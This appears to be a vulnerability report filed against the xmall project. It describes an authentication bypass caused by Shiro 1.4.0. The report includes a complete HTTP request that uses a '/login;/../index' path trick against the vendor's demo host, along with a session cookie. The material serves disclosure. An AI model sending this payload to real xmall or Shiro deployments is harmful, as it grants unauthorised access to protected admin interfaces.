#96·xmall

There is an Incorrect Access Control vulnerability in xmall

Author: RacerZ-fightingCreated Nov 23, 2024Updated Nov 23, 2024

[Suggested description] xmall was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.

[Vulnerability Type] Incorrect access control

[Vendor of Product] https://github.com/Exrick/xmall

[Affected Product Code Base] all version (<= v1.1)

[Affected Component] All interface require authentication

[Attack Type] Remote

[Vulnerability details] Send the payload below to the interface /index

GET /login;/../index HTTP/1.1
Host: xmadmin.exrick.cn
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: xmadmin.exrick.cn
Connection: keep-alive
Cookie: JSESSIONID=AFB6620FA06404C85D9C5E285E193F8C
imageimage

[Cause of vulnerability] Shiro is used for authentication in Xmall, but version 1.4.0 contains an insecure implementation image Meanwhile, xmall includes some interfaces configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass. image